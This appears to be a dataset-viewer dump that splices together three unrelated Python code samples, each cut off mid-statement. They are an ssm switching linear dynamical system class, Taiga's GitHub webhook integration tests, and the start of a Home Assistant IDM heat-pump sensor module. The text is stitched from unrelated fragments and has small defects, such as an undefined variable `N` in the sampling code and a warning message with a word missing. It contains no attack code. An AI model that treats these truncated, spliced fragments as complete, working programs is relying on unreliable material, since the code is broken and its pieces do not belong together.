input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
import copy
import warnings
from tqdm.auto import trange
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd.tracer import getval
from autograd.misc import flatten
from autograd import value_and_grad
from ssm.optimizers import adam_step, rmsprop_step, sgd_step, convex_combination
from ssm.primitives import hmm_normalizer, hmm_expected_states, hmm_filter, hmm_sample, viterbi
from ssm.util import ensure_args_are_lists, ensure_args_not_none, \
ensure_slds_args_not_none, ensure_variational_args_are_lists, \
replicate, collapse
import ssm.observations as obs
import ssm.transitions as trans
import ssm.init_state_distns as isd
import ssm.hierarchical as hier
import ssm.emissions as emssn
import ssm.hmm as hmm
__all__ = ['SLDS', 'LDS']
class SLDS(object):
"""
Switching linear dynamical system fit with
stochastic variational inference on the marginal model,
integrating out the discrete states.
"""
def __init__(self, N, K, D, *, M=0,
init_state_distn=None,
transitions="standard",
transition_kwargs=None,
hierarchical_transition_tags=None,
dynamics="gaussian",
dynamics_kwargs=None,
hierarchical_dynamics_tags=None,
emissions="gaussian_orthog",
emission_kwargs=None,
hierarchical_emission_tags=None,
single_subspace=True,
**kwargs):
# Make the initial state distribution
if init_state_distn is None:
init_state_distn = isd.InitialStateDistribution(K, D, M=M)
assert isinstance(init_state_distn, isd.InitialStateDistribution)
# Make the transition model
transition_classes = dict(
standard=trans.StationaryTransitions,
stationary=trans.StationaryTransitions,
sticky=trans.StickyTransitions,
inputdriven=trans.InputDrivenTransitions,
recurrent=trans.RecurrentTransitions,
recurrent_only=trans.RecurrentOnlyTransitions,
rbf_recurrent=trans.RBFRecurrentTransitions,
nn_recurrent=trans.NeuralNetworkRecurrentTransitions
)
if isinstance(transitions, str):
transitions = transitions.lower()
if transitions not in transition_classes:
raise Exception("Invalid transition model: {}. Must be one of {}".
format(transitions, list(transition_classes.keys())))
transition_kwargs = transition_kwargs or {}
transitions = transition_classes[transitions](K, D, M=M, **transition_kwargs)
if not isinstance(transitions, trans.Transitions):
raise TypeError("'transitions' must be a subclass of"
" ssm.transitions.Transitions")
# Make the dynamics distn
dynamics_classes = dict(
none=obs.GaussianObservations,
gaussian=obs.AutoRegressiveObservations,
diagonal_gaussian=obs.AutoRegressiveDiagonalNoiseObservations,
t=obs.RobustAutoRegressiveObservations,
studentst=obs.RobustAutoRegressiveObservations,
diagonal_t=obs.RobustAutoRegressiveDiagonalNoiseObservations,
diagonal_studentst=obs.RobustAutoRegressiveDiagonalNoiseObservations,
)
if isinstance(dynamics, str):
dynamics = dynamics.lower()
if dynamics not in dynamics_classes:
raise Exception("Invalid dynamics model: {}. Must be one of {}".
format(dynamics, list(dynamics_classes.keys())))
dynamics_kwargs = dynamics_kwargs or {}
dynamics = dynamics_classes[dynamics](K, D, M=M, **dynamics_kwargs)
if not isinstance(dynamics, obs.Observations):
raise TypeError("'dynamics' must be a subclass of"
" ssm.observations.Observations")
# Make the emission distn
emission_classes = dict(
gaussian=emssn.GaussianEmissions,
gaussian_orthog=emssn.GaussianOrthogonalEmissions,
gaussian_id=emssn.GaussianIdentityEmissions,
gaussian_nn=emssn.GaussianNeuralNetworkEmissions,
studentst=emssn.StudentsTEmissions,
studentst_orthog=emssn.StudentsTOrthogonalEmissions,
studentst_id=emssn.StudentsTIdentityEmissions,
studentst_nn=emssn.StudentsTNeuralNetworkEmissions,
t=emssn.StudentsTEmissions,
t_orthog=emssn.StudentsTOrthogonalEmissions,
t_id=emssn.StudentsTIdentityEmissions,
t_nn=emssn.StudentsTNeuralNetworkEmissions,
poisson=emssn.PoissonEmissions,
poisson_orthog=emssn.PoissonOrthogonalEmissions,
poisson_id=emssn.PoissonIdentityEmissions,
poisson_nn=emssn.PoissonNeuralNetworkEmissions,
bernoulli=emssn.BernoulliEmissions,
bernoulli_orthog=emssn.BernoulliOrthogonalEmissions,
bernoulli_id=emssn.BernoulliIdentityEmissions,
bernoulli_nn=emssn.BernoulliNeuralNetworkEmissions,
ar=emssn.AutoRegressiveEmissions,
ar_orthog=emssn.AutoRegressiveOrthogonalEmissions,
ar_id=emssn.AutoRegressiveIdentityEmissions,
ar_nn=emssn.AutoRegressiveNeuralNetworkEmissions,
autoregressive=emssn.AutoRegressiveEmissions,
autoregressive_orthog=emssn.AutoRegressiveOrthogonalEmissions,
autoregressive_id=emssn.AutoRegressiveIdentityEmissions,
autoregressive_nn=emssn.AutoRegressiveNeuralNetworkEmissions
)
if isinstance(emissions, str):
emissions = emissions.lower()
if emissions not in emission_classes:
raise Exception("Invalid emission model: {}. Must be one of {}".
format(emissions, list(emission_classes.keys())))
emission_kwargs = emission_kwargs or {}
emissions = emission_classes[emissions](N, K, D, M=M,
single_subspace=single_subspace, **emission_kwargs)
if not isinstance(emissions, emssn.Emissions):
raise TypeError("'emissions' must be a subclass of"
" ssm.emissions.Emissions")
self.N, self.K, self.D, self.M = N, K, D, M
self.init_state_distn = init_state_distn
self.transitions = transitions
self.dynamics = dynamics
self.emissions = emissions
@property
def params(self):
return self.init_state_distn.params, \
self.transitions.params, \
self.dynamics.params, \
self.emissions.params
@params.setter
def params(self, value):
self.init_state_distn.params = value[0]
self.transitions.params = value[1]
self.dynamics.params = value[2]
self.emissions.params = value[3]
    @ensure_args_are_lists
    def initialize(self, datas, inputs=None, masks=None, tags=None, num_em_iters=25):
        """
        Initialize the model parameters from data.

        First initializes the emission model, then inverts the emissions to
        obtain continuous latents for each sequence, and finally fits an ARHMM
        to those latents with EM to initialize the initial state distribution,
        transitions, and dynamics.
        """
        # First initialize the observation model
        self.emissions.initialize(datas, inputs, masks, tags)
        # Get the initialized variational mean for the data
        xs = [self.emissions.invert(data, input, mask, tag)
              for data, input, mask, tag in zip(datas, inputs, masks, tags)]
        # The inverted latents are treated as fully observed by the ARHMM.
        xmasks = [np.ones_like(x, dtype=bool) for x in xs]
        # Now run a few iterations of EM on a ARHMM with the variational mean
        print("Initializing with an ARHMM using {} steps of EM.".format(num_em_iters))
        # Fit deep copies of the current components so this model's state is
        # untouched until the fit completes.
        arhmm = hmm.HMM(self.K, self.D, M=self.M,
                        init_state_distn=copy.deepcopy(self.init_state_distn),
                        transitions=copy.deepcopy(self.transitions),
                        observations=copy.deepcopy(self.dynamics))
        arhmm.fit(xs, inputs=inputs, masks=xmasks, tags=tags,
                  method="em", num_em_iters=num_em_iters)
        # Adopt the fitted ARHMM components.
        self.init_state_distn = copy.deepcopy(arhmm.init_state_distn)
        self.transitions = copy.deepcopy(arhmm.transitions)
        self.dynamics = copy.deepcopy(arhmm.observations)
def permute(self, perm):
"""
Permute the discrete latent states.
"""
assert np.all(np.sort(perm) == np.arange(self.K))
self.init_state_distn.permute(perm)
self.transitions.permute(perm)
self.dynamics.permute(perm)
self.emissions.permute(perm)
def log_prior(self):
"""
Compute the log prior probability of the model parameters
"""
return self.init_state_distn.log_prior() + \
self.transitions.log_prior() + \
self.dynamics.log_prior() + \
self.emissions.log_prior()
def sample(self, T, input=None, tag=None, prefix=None, with_noise=True):
K = self.K
D = (self.D,) if isinstance(self.D, int) else self.D
M = (self.M,) if isinstance(self.M, int) else self.M
assert isinstance(D, tuple)
assert isinstance(M, tuple)
# If prefix is given, pad the output with it
if prefix is None:
pad = 1
z = np.zeros(T+1, dtype=int)
x = np.zeros((T+1,) + D)
data = np.zeros((T+1,) + D)
input = np.zeros((T+1,) + M) if input is None else input
xmask = np.ones((T+1,) + D, dtype=bool)
# Sample the first state from the initial distribution
pi0 = np.exp(self.init_state_distn.log_initial_state_distn(data, input, xmask, tag))
z[0] = npr.choice(self.K, p=pi0)
x[0] = self.dynamics.sample_x(z[0], x[:0], tag=tag, with_noise=with_noise)
else:
zhist, xhist, yhist = prefix
pad = len(zhist)
assert zhist.dtype == int and zhist.min() >= 0 and zhist.max() < K
assert xhist.shape == (pad, D)
assert yhist.shape == (pad, N)
z = np.concatenate((zhist, np.zeros(T, dtype=int)))
x = np.concatenate((xhist, np.zeros((T,) + D)))
input = np.zeros((T+pad,) + M) if input is None else input
xmask = np.ones((T+pad,) + D, dtype=bool)
# Sample z and x
for t in range(pad, T+pad):
Pt = np.exp(self.transitions.log_transition_matrices(x[t-1:t+1], input[t-1:t+1], mask=xmask[t-1:t+1], tag=tag))[0]
z[t] = npr.choice(self.K, p=Pt[z[t-1]])
x[t] = self.dynamics.sample_x(z[t], x[:t], input=input[t], tag=tag, with_noise=with_noise)
# Sample observations given latent states
# TODO: sample in the loop above?
y = self.emissions.sample(z, x, input=input, tag=tag)
return z[pad:], x[pad:], y[pad:]
@ensure_slds_args_not_none
def expected_states(self, variational_mean, data, input=None, mask=None, tag=None):
x_mask = np.ones_like(variational_mean, dtype=bool)
log_pi0 = self.init_state_distn.log_initial_state_distn(variational_mean, input, x_mask, tag)
log_Ps = self.transitions.log_transition_matrices(variational_mean, input, x_mask, tag)
log_likes = self.dynamics.log_likelihoods(variational_mean, input, x_mask, tag)
log_likes += self.emissions.log_likelihoods(data, input, mask, tag, variational_mean)
return hmm_expected_states(log_pi0, log_Ps, log_likes)
@ensure_slds_args_not_none
def most_likely_states(self, variational_mean, data, input=None, mask=None, tag=None):
log_pi0 = self.init_state_distn.log_initial_state_distn(variational_mean, input, mask, tag)
log_Ps = self.transitions.log_transition_matrices(variational_mean, input, mask, tag)
log_likes = self.dynamics.log_likelihoods(variational_mean, input, np.ones_like(variational_mean, dtype=bool), tag)
log_likes += self.emissions.log_likelihoods(data, input, mask, tag, variational_mean)
return viterbi(log_pi0, log_Ps, log_likes)
@ensure_slds_args_not_none
def smooth(self, variational_mean, data, input=None, mask=None, tag=None):
"""
Compute the mean observation under the posterior distribution
of latent discrete states.
"""
Ez, _, _ = self.expected_states(variational_mean, data, input, mask, tag)
return self.emissions.smooth(Ez, variational_mean, data, input, tag)
@ensure_args_are_lists
def log_probability(self, datas, inputs=None, masks=None, tags=None):
warnings.warn("Cannot compute exact marginal log probability for the SLDS. "
"the ELBO instead.")
return np.nan
    @ensure_variational_args_are_lists
    def elbo(self, variational_posterior, datas, inputs=None, masks=None, tags=None, n_samples=1):
        """
        Lower bound on the marginal likelihood p(y | theta)
        using variational posterior q(x; phi) where phi = variational_params

        Estimated by Monte Carlo: for each of `n_samples` draws from q,
        accumulate log p(theta) + log p(x, y | theta) - log q(x), then average.
        """
        elbo = 0
        for sample in range(n_samples):
            # Sample x from the variational posterior
            xs = variational_posterior.sample()

            # log p(theta)
            elbo += self.log_prior()

            # log p(x, y | theta) = log \sum_z p(x, y, z | theta)
            for x, data, input, mask, tag in zip(xs, datas, inputs, masks, tags):
                # The "mask" for x is all ones
                x_mask = np.ones_like(x, dtype=bool)
                log_pi0 = self.init_state_distn.log_initial_state_distn(x, input, x_mask, tag)
                log_Ps = self.transitions.log_transition_matrices(x, input, x_mask, tag)
                log_likes = self.dynamics.log_likelihoods(x, input, x_mask, tag)
                log_likes += self.emissions.log_likelihoods(data, input, mask, tag, x)
                # The discrete states are summed out exactly by the HMM normalizer.
                elbo += hmm_normalizer(log_pi0, log_Ps, log_likes)

            # -log q(x)
            elbo -= variational_posterior.log_density(xs)
            assert np.isfinite(elbo)

        return elbo / n_samples
@ensure_variational_args_are_lists
def _surrogate_elbo(self, variational_posterior, datas, inputs=None, masks=None, tags=None,
alpha=0.75, **kwargs):
"""
Lower bound on the marginal likelihood p(y | gamma)
using variational posterior q(x; phi) where phi = variational_params
and gamma = emission parameters. As part of computing this objective,
we optimize q(z | x) and take a natural gradient step wrt theta, the
parameters of the dynamics model.
Note that the surrogate ELBO is a lower bound on the ELBO above.
E_p(z | x, y)[log p(z, x, y)]
= E_p(z | x, y)[log p(z, x, y) - log p(z | x, y) + log p(z | x, y)]
= E_p(z | x, y)[log p(x, y) + log p(z | x, y)]
= log p(x, y) + E_p(z | x, y)[log p(z | x, y)]
= log p(x, y) -H[p(z | x, y)]
<= log p(x, y)
with equality only when p(z | x, y) is atomic. The gap equals the
entropy of the posterior on z.
"""
# log p(theta)
elbo = self.log_prior()
# Sample x from the variational posterior
xs = variational_posterior.sample()
# Inner optimization: find the true posterior p(z | x, y; theta).
# Then maximize the inner ELBO wrt theta,
#
# E_p(z | x, y; theta_fixed)[log p(z, x, y; theta).
#
# This can be seen as a natural gradient step in theta
# space. Note: we do not want to compute gradients wrt x or the
# emissions parameters backward throgh this optimization step,
# so we unbox them first.
xs_unboxed = [getval(x) for x in xs]
emission_params_boxed = self.emissions.params
flat_emission_params_boxed, unflatten = flatten(emission_params_boxed)
self.emissions.params = unflatten(getval(flat_emission_params_boxed))
# E step: compute the true posterior | |
<filename>tests/integration/test_hooks_github.py
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
from unittest import mock
from django.core.urlresolvers import reverse
from django.core import mail
from taiga.base.utils import json
from taiga.hooks.github import event_hooks
from taiga.hooks.github.api import GitHubViewSet
from taiga.hooks.exceptions import ActionSyntaxException
from taiga.projects import choices as project_choices
from taiga.projects.epics.models import Epic
from taiga.projects.issues.models import Issue
from taiga.projects.tasks.models import Task
from taiga.projects.userstories.models import UserStory
from taiga.projects.models import Membership
from taiga.projects.history.services import get_history_queryset_by_model_instance, take_snapshot
from taiga.projects.notifications.choices import NotifyLevel
from taiga.projects.notifications.models import NotifyPolicy
from taiga.projects import services
from .. import factories as f
pytestmark = pytest.mark.django_db
def test_bad_project(client):
    """A corrupted project id in the hook URL yields a 400 with an error message."""
    project = f.ProjectFactory()
    url = reverse("github-hook-list")
    # Append junk to the id so the project lookup fails.
    url = "%s?project=%s-extra-text-added" % (url, project.id)
    data = {"test:": "data"}
    response = client.post(url, json.dumps(data),
                           HTTP_X_HUB_SIGNATURE="sha1=3c8e83fdaa266f81c036ea0b71e98eb5e054581a",
                           content_type="application/json")
    response_content = response.data
    assert response.status_code == 400
    assert "The project doesn't exist" in response_content["_error_message"]
def test_bad_signature(client):
    """An invalid X-Hub-Signature header is rejected with a 400."""
    project = f.ProjectFactory()
    url = reverse("github-hook-list")
    url = "%s?project=%s" % (url, project.id)
    data = {}
    response = client.post(url, json.dumps(data),
                           HTTP_X_HUB_SIGNATURE="sha1=badbadbad",
                           content_type="application/json")
    response_content = response.data
    assert response.status_code == 400
    assert "Bad signature" in response_content["_error_message"]
def test_ok_signature(client):
    """A valid signature for a configured secret is accepted (204)."""
    project = f.ProjectFactory()
    f.ProjectModulesConfigFactory(project=project, config={
        "github": {
            "secret": "<KEY>"
        }
    })
    url = reverse("github-hook-list")
    url = "%s?project=%s" % (url, project.id)
    data = {"test:": "data"}
    # NOTE(review): the sha1 value is presumably precomputed for this exact
    # secret/payload pair -- verify if the payload or secret ever changes.
    response = client.post(url, json.dumps(data),
                           HTTP_X_HUB_SIGNATURE="sha1=3c8e83fdaa266f81c036ea0b71e98eb5e054581a",
                           content_type="application/json")
    assert response.status_code == 204
def test_blocked_project(client):
    """Hooks for a blocked project are refused with HTTP 451."""
    project = f.ProjectFactory(blocked_code=project_choices.BLOCKED_BY_STAFF)
    f.ProjectModulesConfigFactory(project=project, config={
        "github": {
            "secret": "<KEY>"
        }
    })
    url = reverse("github-hook-list")
    url = "%s?project=%s" % (url, project.id)
    data = {"test:": "data"}
    response = client.post(url, json.dumps(data),
                           HTTP_X_HUB_SIGNATURE="sha1=3c8e83fdaa266f81c036ea0b71e98eb5e054581a",
                           content_type="application/json")
    assert response.status_code == 451
def test_push_event_detected(client):
    """A push event header routes the payload to PushEventHook.process_event."""
    project = f.ProjectFactory()
    url = reverse("github-hook-list")
    url = "%s?project=%s" % (url, project.id)
    data = {"commits": [
        {"message": "test message"},
    ]}
    # NOTE(review): this patches the class attribute without restoring it,
    # so signature validation stays mocked for later tests in the module.
    GitHubViewSet._validate_signature = mock.Mock(return_value=True)
    with mock.patch.object(event_hooks.PushEventHook, "process_event") as process_event_mock:
        response = client.post(url, json.dumps(data),
                               HTTP_X_GITHUB_EVENT="push",
                               content_type="application/json")
        assert process_event_mock.call_count == 1
    assert response.status_code == 204
def test_push_event_epic_processing(client):
    """A commit message 'TG-<ref> #<slug>' moves an epic to the new status and notifies."""
    creation_status = f.EpicStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_epics"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    new_status = f.EpicStatusFactory(project=creation_status.project)
    epic = f.EpicFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s #%s ok
            bye!
        """ % (epic.ref, new_status.slug)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(epic.project, payload)
    ev_hook.process_event()
    # Re-fetch to observe the status change performed by the hook.
    epic = Epic.objects.get(id=epic.id)
    assert epic.status.id == new_status.id
    assert len(mail.outbox) == 1
def test_push_event_issue_processing(client):
    """A commit message 'TG-<ref> #<slug>' moves an issue to the new status and notifies."""
    creation_status = f.IssueStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_issues"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    new_status = f.IssueStatusFactory(project=creation_status.project)
    issue = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s #%s ok
            bye!
        """ % (issue.ref, new_status.slug)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(issue.project, payload)
    ev_hook.process_event()
    # Re-fetch to observe the status change performed by the hook.
    issue = Issue.objects.get(id=issue.id)
    assert issue.status.id == new_status.id
    assert len(mail.outbox) == 1
def test_push_event_task_processing(client):
    """A commit message 'TG-<ref> #<slug>' moves a task to the new status and notifies."""
    creation_status = f.TaskStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_tasks"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    new_status = f.TaskStatusFactory(project=creation_status.project)
    task = f.TaskFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s #%s ok
            bye!
        """ % (task.ref, new_status.slug)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(task.project, payload)
    ev_hook.process_event()
    # Re-fetch to observe the status change performed by the hook.
    task = Task.objects.get(id=task.id)
    assert task.status.id == new_status.id
    assert len(mail.outbox) == 1
def test_push_event_user_story_processing(client):
    """A commit message 'TG-<ref> #<slug>' moves a user story to the new status and notifies."""
    creation_status = f.UserStoryStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_us"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    new_status = f.UserStoryStatusFactory(project=creation_status.project)
    user_story = f.UserStoryFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s #%s ok
            bye!
        """ % (user_story.ref, new_status.slug)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(user_story.project, payload)
    ev_hook.process_event()
    # Re-fetch to observe the status change performed by the hook.
    user_story = UserStory.objects.get(id=user_story.id)
    assert user_story.status.id == new_status.id
    assert len(mail.outbox) == 1
def test_push_event_issue_mention(client):
    """Mentioning 'TG-<ref>' without a status adds a history comment on the issue."""
    creation_status = f.IssueStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_issues"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    issue = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    # Snapshot so the mention produces a history entry to compare against.
    take_snapshot(issue, user=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s ok
            bye!
        """ % (issue.ref)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(issue.project, payload)
    ev_hook.process_event()
    issue_history = get_history_queryset_by_model_instance(issue)
    assert issue_history.count() == 1
    assert issue_history[0].comment.startswith("This issue has been mentioned by")
    assert len(mail.outbox) == 1
def test_push_event_task_mention(client):
    """Mentioning 'TG-<ref>' without a status adds a history comment on the task."""
    creation_status = f.TaskStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_tasks"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    task = f.TaskFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    # Snapshot so the mention produces a history entry to compare against.
    take_snapshot(task, user=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s ok
            bye!
        """ % (task.ref)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(task.project, payload)
    ev_hook.process_event()
    task_history = get_history_queryset_by_model_instance(task)
    assert task_history.count() == 1
    assert task_history[0].comment.startswith("This task has been mentioned by")
    assert len(mail.outbox) == 1
def test_push_event_user_story_mention(client):
    """Mentioning 'TG-<ref>' without a status adds a history comment on the user story."""
    creation_status = f.UserStoryStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_us"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    user_story = f.UserStoryFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    # Snapshot so the mention produces a history entry to compare against.
    take_snapshot(user_story, user=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s ok
            bye!
        """ % (user_story.ref)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(user_story.project, payload)
    ev_hook.process_event()
    us_history = get_history_queryset_by_model_instance(user_story)
    assert us_history.count() == 1
    assert us_history[0].comment.startswith("This user story has been mentioned by")
    assert len(mail.outbox) == 1
def test_push_event_multiple_actions(client):
    """One commit message may reference several items; each is updated and notified."""
    creation_status = f.IssueStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_issues"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    new_status = f.IssueStatusFactory(project=creation_status.project)
    issue1 = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    issue2 = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    payload = {"commits": [
        {"message": """test message
            test TG-%s #%s ok
            test TG-%s #%s ok
            bye!
        """ % (issue1.ref, new_status.slug, issue2.ref, new_status.slug)},
    ]}
    mail.outbox = []
    ev_hook1 = event_hooks.PushEventHook(issue1.project, payload)
    ev_hook1.process_event()
    # Re-fetch both issues to observe the status changes.
    issue1 = Issue.objects.get(id=issue1.id)
    issue2 = Issue.objects.get(id=issue2.id)
    assert issue1.status.id == new_status.id
    assert issue2.status.id == new_status.id
    # One notification per updated issue.
    assert len(mail.outbox) == 2
def test_push_event_processing_case_insensitive(client):
    """Both the 'tg-' prefix and the status slug match case-insensitively."""
    creation_status = f.TaskStatusFactory()
    role = f.RoleFactory(project=creation_status.project, permissions=["view_tasks"])
    f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
    new_status = f.TaskStatusFactory(project=creation_status.project)
    task = f.TaskFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
    # Lower-case prefix, upper-cased slug.
    payload = {"commits": [
        {"message": """test message
            test tg-%s #%s ok
            bye!
        """ % (task.ref, new_status.slug.upper())},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(task.project, payload)
    ev_hook.process_event()
    task = Task.objects.get(id=task.id)
    assert task.status.id == new_status.id
    assert len(mail.outbox) == 1
def test_push_event_task_bad_processing_non_existing_ref(client):
    """Referencing a non-existent element raises and sends no mail."""
    # NOTE(review): despite the "task" in the test name, this uses an issue
    # status -- presumably the error path is shared; confirm or rename.
    issue_status = f.IssueStatusFactory()
    payload = {"commits": [
        {"message": """test message
            test TG-6666666 #%s ok
            bye!
        """ % (issue_status.slug)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(issue_status.project, payload)
    with pytest.raises(ActionSyntaxException) as excinfo:
        ev_hook.process_event()
    assert str(excinfo.value) == "The referenced element doesn't exist"
    assert len(mail.outbox) == 0
def test_push_event_us_bad_processing_non_existing_status(client):
    """A user-story reference with an unknown status slug raises and sends no mail."""
    user_story = f.UserStoryFactory.create()
    payload = {"commits": [
        {"message": """test message
            test TG-%s #non-existing-slug ok
            bye!
        """ % (user_story.ref)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(user_story.project, payload)
    with pytest.raises(ActionSyntaxException) as excinfo:
        ev_hook.process_event()
    assert str(excinfo.value) == "The status doesn't exist"
    assert len(mail.outbox) == 0
def test_push_event_bad_processing_non_existing_status(client):
    """An issue reference with an unknown status slug raises and sends no mail."""
    issue = f.IssueFactory.create()
    payload = {"commits": [
        {"message": """test message
            test TG-%s #non-existing-slug ok
            bye!
        """ % (issue.ref)},
    ]}
    mail.outbox = []
    ev_hook = event_hooks.PushEventHook(issue.project, payload)
    with pytest.raises(ActionSyntaxException) as excinfo:
        ev_hook.process_event()
    assert str(excinfo.value) == "The status doesn't exist"
    assert len(mail.outbox) == 0
def test_issues_event_opened_issue(client):
    """An 'opened' GitHub issue event creates a new Taiga issue and notifies."""
    issue = f.IssueFactory.create()
    # Configure project defaults used when creating the imported issue.
    issue.project.default_issue_status = issue.status
    issue.project.default_issue_type = issue.type
    issue.project.default_severity = issue.severity
    issue.project.default_priority = issue.priority
    issue.project.save()
    Membership.objects.create(user=issue.owner, project=issue.project, role=f.RoleFactory.create(project=issue.project), is_admin=True)
    # Opt the owner into all notifications so a mail is sent.
    notify_policy = NotifyPolicy.objects.get(user=issue.owner, project=issue.project)
    notify_policy.notify_level = NotifyLevel.all
    notify_policy.save()
    payload = {
        "action": "opened",
        "issue": {
            "title": "test-title",
            "body": "test-body",
            "html_url": "http://github.com/test/project/issues/11",
        },
        "assignee": {},
        "label": {},
        "repository": {
            "html_url": "test",
        },
    }
    mail.outbox = []
    ev_hook = event_hooks.IssuesEventHook(issue.project, payload)
    ev_hook.process_event()
    # Original issue plus the one created from the event.
    assert Issue.objects.count() == 2
    assert len(mail.outbox) == 1
def test_issues_event_other_than_opened_issue(client):
    """Non-'opened' issue events are ignored: no new issue, no mail."""
    issue = f.IssueFactory.create()
    issue.project.default_issue_status = issue.status
    issue.project.default_issue_type = issue.type
    issue.project.default_severity = issue.severity
    issue.project.default_priority = issue.priority
    issue.project.save()
    payload = {
        "action": "closed",
        "issue": {
            "title": "test-title",
            "body": "test-body",
            "html_url": "http://github.com/test/project/issues/11",
        },
        "assignee": {},
        "label": {},
    }
    mail.outbox = []
    ev_hook = event_hooks.IssuesEventHook(issue.project, payload)
    ev_hook.process_event()
    assert Issue.objects.count() == 1
    assert len(mail.outbox) == 0
def test_issues_event_bad_issue(client):
    """An 'opened' event with an empty issue payload raises and creates nothing."""
    issue = f.IssueFactory.create()
    issue.project.default_issue_status = issue.status
    issue.project.default_issue_type = issue.type
    issue.project.default_severity = issue.severity
    issue.project.default_priority = issue.priority
    issue.project.save()
    payload = {
        "action": "opened",
        "issue": {},
        "assignee": {},
        "label": {},
    }
    mail.outbox = []
    ev_hook = event_hooks.IssuesEventHook(issue.project, payload)
    with pytest.raises(ActionSyntaxException) as excinfo:
        ev_hook.process_event()
    assert str(excinfo.value) == "Invalid issue information"
    assert Issue.objects.count() == 1
    assert len(mail.outbox) == 0
def test_issue_comment_event_on_existing_issue_task_and_us(client):
project = f.ProjectFactory()
role = f.RoleFactory(project=project, permissions=["view_tasks", "view_issues", "view_us"])
f.MembershipFactory(project=project, role=role, user=project.owner)
user = f.UserFactory()
issue = f.IssueFactory.create(external_reference=["github", "http://github.com/test/project/issues/11"], owner=project.owner, project=project)
take_snapshot(issue, user=user)
task = f.TaskFactory.create(external_reference=["github", "http://github.com/test/project/issues/11"], owner=project.owner, project=project)
take_snapshot(task, user=user)
us = f.UserStoryFactory.create(external_reference=["github", "http://github.com/test/project/issues/11"], owner=project.owner, project=project)
take_snapshot(us, user=user)
payload = {
"action": "created",
"issue": {
"html_url": "http://github.com/test/project/issues/11",
},
"comment": {
"body": "Test body",
},
"repository": {
"html_url": "test",
},
}
mail.outbox = []
assert get_history_queryset_by_model_instance(issue).count() == 0
assert | |
from abc import ABC, abstractmethod, abstractproperty
from dataclasses import dataclass
from typing import Dict, List, Union
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntityDescription,
SensorStateClass,
)
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntityDescription,
)
from homeassistant.const import (
CURRENCY_EURO,
ENERGY_KILO_WATT_HOUR,
PERCENTAGE,
POWER_KILO_WATT,
TEMP_CELSIUS,
)
from pymodbus.payload import BinaryPayloadDecoder
from .const import BINARY_SENSOR, CONF_DISPLAY_NAME
@dataclass
class IdmSensorAddress(ABC):
    """Describes one of the sensors of an IDM heatpump."""

    address: int
    name: str
    device_class: SensorDeviceClass
    state_class: SensorStateClass

    # MODERNIZATION: `abstractproperty` is deprecated since Python 3.3;
    # stacking @property over @abstractmethod is the supported equivalent.
    @property
    @abstractmethod
    def size(self) -> int:
